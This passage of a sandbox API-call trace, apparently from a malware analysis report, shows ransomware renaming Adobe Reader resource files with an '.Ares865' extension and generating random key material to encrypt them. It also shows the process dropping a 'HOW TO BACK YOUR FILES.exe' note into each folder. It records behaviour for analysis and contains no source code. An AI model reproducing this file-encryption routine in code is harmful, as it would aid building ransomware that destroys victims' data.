10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa.fca.ares865"), dwFlags=0x1) returned 1 [0159.173] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.173] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4668) returned 1 [0159.173] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.174] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.174] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.177] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.177] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.177] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.178] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="usa03.hsp" | out: lpString1="usa03.hsp") returned="usa03.hsp" [0159.178] lstrlenW (lpString="usa03.hsp") returned 9 [0159.178] lstrlenW (lpString="Ares865") returned 7 [0159.178] lstrcmpiW (lpString1="a03.hsp", lpString2="Ares865") returned -1 [0159.178] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp.Ares865") returned 105 [0159.178] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.hsp.ares865"), dwFlags=0x1) returned 1 [0159.182] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.182] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=173786) returned 1 [0159.182] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.183] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.183] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.195] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.195] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.195] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.198] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="usa03.ths" | out: lpString1="usa03.ths") returned="usa03.ths" [0159.198] lstrlenW (lpString="usa03.ths") returned 9 [0159.198] lstrlenW (lpString="Ares865") returned 7 [0159.198] lstrcmpiW (lpString1="a03.ths", lpString2="Ares865") returned -1 [0159.199] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths.Ares865") returned 105 [0159.199] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.ths.ares865"), dwFlags=0x1) returned 1 [0159.201] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.201] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=662528) returned 1 [0159.201] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.253] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.253] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.253] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.262] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="usa37.hyp" | out: lpString1="usa37.hyp") returned="usa37.hyp" [0159.262] lstrlenW (lpString="usa37.hyp") returned 9 [0159.262] lstrlenW (lpString="Ares865") returned 7 [0159.262] lstrcmpiW (lpString1="a37.hyp", lpString2="Ares865") returned -1 [0159.263] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp.Ares865") returned 105 [0159.263] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa37.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa37.hyp.ares865"), dwFlags=0x1) returned 1 [0159.265] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa37.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.266] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=88064) returned 1 [0159.266] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.267] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.267] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.276] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.277] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.277] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.278] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2" [0159.279] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2" [0159.279] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0159.279] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\how to back your files.exe"), bFailIfExists=1) returned 0 [0159.280] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0159.281] GetLastError () returned 0x0 [0159.283] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0159.283] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dcf09c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x545b54c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x545b54c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0159.283] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0159.283] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0159.284] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar.txt" | out: lpString1="DisplayLanguageNames.ar.txt") returned="DisplayLanguageNames.ar.txt" [0159.284] lstrlenW (lpString="DisplayLanguageNames.ar.txt") returned 27 [0159.284] lstrlenW (lpString="Ares865") returned 7 [0159.284] lstrcmpiW (lpString1=".ar.txt", lpString2="Ares865") returned -1 [0159.284] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar.txt.Ares865") returned 112 [0159.284] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar.txt.ares865"), dwFlags=0x1) returned 1 [0159.287] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.287] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27784) returned 1 [0159.288] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.288] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.288] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.292] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.292] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.292] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.293] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_AE.txt" | out: lpString1="DisplayLanguageNames.ar_AE.txt") returned="DisplayLanguageNames.ar_AE.txt" [0159.293] lstrlenW (lpString="DisplayLanguageNames.ar_AE.txt") returned 30 [0159.293] lstrlenW (lpString="Ares865") returned 7 [0159.293] lstrcmpiW (lpString1="_AE.txt", lpString2="Ares865") returned -1 [0159.294] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_AE.txt.Ares865") returned 115 [0159.294] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_AE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ae.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_AE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ae.txt.ares865"), dwFlags=0x1) returned 1 [0159.299] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_AE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ae.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.299] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27784) returned 1 [0159.299] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.300] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.300] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.303] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.304] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.304] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.305] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_BH.txt" | out: lpString1="DisplayLanguageNames.ar_BH.txt") returned="DisplayLanguageNames.ar_BH.txt" [0159.305] lstrlenW (lpString="DisplayLanguageNames.ar_BH.txt") returned 30 [0159.305] lstrlenW (lpString="Ares865") returned 7 [0159.305] lstrcmpiW (lpString1="_BH.txt", lpString2="Ares865") returned -1 [0159.305] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_BH.txt.Ares865") returned 115 [0159.305] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_BH.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_bh.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_BH.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_bh.txt.ares865"), dwFlags=0x1) returned 1 [0159.307] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_BH.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_bh.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.307] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.307] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.308] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.308] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.311] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.312] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.312] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.313] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_DZ.txt" | out: lpString1="DisplayLanguageNames.ar_DZ.txt") returned="DisplayLanguageNames.ar_DZ.txt" [0159.313] lstrlenW (lpString="DisplayLanguageNames.ar_DZ.txt") returned 30 [0159.313] lstrlenW (lpString="Ares865") returned 7 [0159.313] lstrcmpiW (lpString1="_DZ.txt", lpString2="Ares865") returned -1 [0159.313] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_DZ.txt.Ares865") returned 115 [0159.313] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_DZ.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_dz.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_DZ.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_dz.txt.ares865"), dwFlags=0x1) returned 1 [0159.315] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_DZ.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_dz.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.315] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.316] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.316] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.316] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.320] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.321] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.321] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.321] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_EG.txt" | out: lpString1="DisplayLanguageNames.ar_EG.txt") returned="DisplayLanguageNames.ar_EG.txt" [0159.322] lstrlenW (lpString="DisplayLanguageNames.ar_EG.txt") returned 30 [0159.322] lstrlenW (lpString="Ares865") returned 7 [0159.322] lstrcmpiW (lpString1="_EG.txt", lpString2="Ares865") returned -1 [0159.322] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_EG.txt.Ares865") returned 115 [0159.322] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_EG.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_eg.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_EG.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_eg.txt.ares865"), dwFlags=0x1) returned 1 [0159.324] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_EG.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_eg.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.324] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.324] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.325] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.325] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.329] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.330] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.330] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.330] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_IN.txt" | out: lpString1="DisplayLanguageNames.ar_IN.txt") returned="DisplayLanguageNames.ar_IN.txt" [0159.331] lstrlenW (lpString="DisplayLanguageNames.ar_IN.txt") returned 30 [0159.331] lstrlenW (lpString="Ares865") returned 7 [0159.331] lstrcmpiW (lpString1="_IN.txt", lpString2="Ares865") returned -1 [0159.331] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IN.txt.Ares865") returned 115 [0159.331] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IN.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_in.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IN.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_in.txt.ares865"), dwFlags=0x1) returned 1 [0159.334] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IN.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_in.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.334] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.334] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.335] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.335] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.341] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.341] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.341] CryptReleaseContext 